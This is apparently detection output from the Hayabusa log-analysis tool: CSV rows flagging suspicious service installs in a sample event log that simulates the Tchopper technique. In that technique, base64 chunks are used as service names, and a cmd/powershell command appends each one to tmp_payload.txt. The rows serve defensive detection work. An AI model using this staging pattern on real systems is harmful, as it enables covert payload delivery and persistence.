execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 